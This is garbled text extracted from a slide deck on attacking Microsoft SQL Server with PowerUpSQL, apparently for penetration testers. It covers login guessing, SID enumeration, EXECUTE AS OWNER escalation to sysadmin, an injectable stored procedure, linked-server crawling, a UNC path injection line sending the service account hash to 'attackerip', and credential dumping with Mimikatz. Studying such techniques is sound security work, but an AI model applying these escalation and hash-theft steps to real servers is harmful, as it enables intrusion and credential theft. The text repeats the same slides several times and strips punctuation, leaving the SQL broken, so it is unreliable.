Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
